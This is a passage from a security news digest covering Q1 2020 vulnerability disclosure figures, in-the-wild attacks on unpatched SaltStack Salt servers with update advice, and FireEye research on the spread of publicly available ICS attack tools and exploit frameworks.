Many factors have been identified as potential contributors to this decline, including the COVID-19 pandemic, though its precise impact may not be known for another year.

“Although the pandemic has already brought unprecedented changes to all walks of life, it is difficult to predict precisely how it will impact vulnerability disclosures this year,” commented Brian Martin, Vice President of Vulnerability Intelligence at Risk Based Security.

“It is possible, as we’ve seen with data breaches, that some researchers and companies may be slower to disclose vulnerabilities. Between drastic changes in work environments and a global pandemic, vulnerability disclosure totals may be directly impacted.”

Many vulnerabilities lacking detail in CVE

Despite the lower total number of vulnerability disclosures in Q1, security teams have their work cut out for them. 561 vulnerabilities have been identified that have a public exploit, yet do not have any detail in CVE.

Worse, 60.2% of those vulnerabilities are remotely exploitable. This is problematic for many organizations that rely on security tools that are based on CVE data and have little in the way of detection and mitigation.

vulnerabilities disclosed Q1 2020

Top ten products by vulnerability disclosures in Q1 2020, as compared to 2019

“Those vulnerabilities include issues such as remote authentication bypass, stored XSS, SQL injection, information disclosure, denial of service, and more,” Mr. Martin concluded.

“Some of these vulnerabilities are present in software from Symantec, Apple, Atlassian, ManageEngine, Nextcloud, Jetbrains, and IBM to name a few. That should give pause to anyone who has to come up with a mitigation strategy where patching ‘in the right order’ becomes a key strategy.”

Have you updated SaltStack Salt? Attacks are underway!

Have you updated your SaltStack Salt “masters” and made them inaccessible over the internet – or at least restricted access to them?

SaltStack Salt attacks

Even though F-Secure researchers declined to publish PoC exploit code for two critical Salt flaws they recently discovered and privately disclosed, it didn’t take long for others to do it and for attackers to try to exploit them.

Successful exploitations

In the wake of the public revelation of the flaws affecting the popular server configuration management framework, attackers hit the LineageOS project, the Ghost blogging platform, DigiCert, as well as Xen Orchestra (a web-based management service for Xen hypervisors) and Algolia (an enterprise search and discovery provider).

The attacks were “noisy” (most installed cryptominers, but some also RATs) and were discovered and publicized quickly, making the number of vulnerable Salt installations exposed on the internet fall from nearly 6,000 to 3,722 in mere five days (May 1 to May 6).

Given the attention the attacks have garnered the number is surely even lower by now and, hopefully, organizations are also updating their internal-facing installations to prevent lateral exploitation and movement.

What to do?

SaltStack provided security updates for both supported (2019.2.3 and 3000.1) and earlier versions (2015.8.x, 2016.3.x, 2016.11.x, 2017.7.x and 2018.3.x) and advised admins to harden their installations further.

There are tools for checking whether installations are vulnerable. There’s also an ongoing thread on GitHub where admins of affected organizations are sharing details about their masters being breached through the flaws.

It’s also good to note that some other solutions might have Salt integrated and will require updates. An example of this is the VMware vRealize Operations Manager, for which VMware plans to release updates soon (in the meantime, workarounds have been made available).

Widely available ICS attack tools lower the barrier for attackers

The general availability of ICS-specific intrusion and attack tools is widening the pool of attackers capable of targeting operational technology (OT) networks and industrial control systems (ICS).

“As ICS are a distinct sub-domain to information and computer technology, successful intrusions and attacks against these systems often requires specialized knowledge, establishing a higher threshold for successful attacks. Since intrusion and attack tools are often developed by someone who already has the expertise, these tools can help threat actors bypass the need for gaining some of this expertise themselves, or it can help them gain the requisite knowledge more quickly,” FireEye researchers point out.

The tools can also come in handy to experienced actors who might want to conceal their identity or maximize their budget.

ICS attack tools: What’s out there?

The researchers have been tracking a large number of publicly available ICS-specific cyber operation tools for a while now, and here’s what they can tell us about them:

  • Most of them have been developed in the last ten years
  • Most tools are vendor agnostic
  • Not unexpectedly, developers mostly concentrate on creating tools to target the most widely used solutions by the largest ICS original equipment manufacturers such as Siemens, Schneider Electric, GE, ABB, Digi International, Rockwell Automation, and Wind River Systems.

Some tools are “standalone”, others come in the form of modules for popular exploitation frameworks.

Over half of the “standalone” tools are aimed at learning about ICS devices attached to a network and software exploitation tools:

ICS attack tools

To create some of the tools, such as ICS-specific malware and ransomware, creators have to have a high degree of knowledge about the target systems as well as coding skills – something that is out of reach for many aspiring attackers.

ICS-specific exploit modules

There is a variety of ICS-specific exploit modules for exploitation framework such as Metasploit (free), Core Impact and Immunity Canvas (both commercial), as well as more recent ICS-specific exploit frameworks: Autosploit, Industrial Exploitation Framework (ICSSPLOIT), and the Industrial Security Exploitation Framework.

“We currently track hundreds of ICS-specific exploit modules related to more than 500 total vulnerabilities, 71 percent of them being potential zero-days,” the researchers noted.

Of the three non-ICS-specific frameworks, Metasploit has the fewest number of ICS-specific exploits, but due to the fact that it’s freely available, these exploits may currently represent the highest danger for defenders.

They mostly target products by these vendors:

ICS attack tools

“Awareness about the proliferation of ICS cyber operation tools should serve as an important risk indicator of the evolving threat landscape,” the researchers noted.

“Organizations that do not pay attention to available ICS cyber operation tools risk becoming low-hanging fruit for both sophisticated and unexperienced threat actors exploring new capabilities.”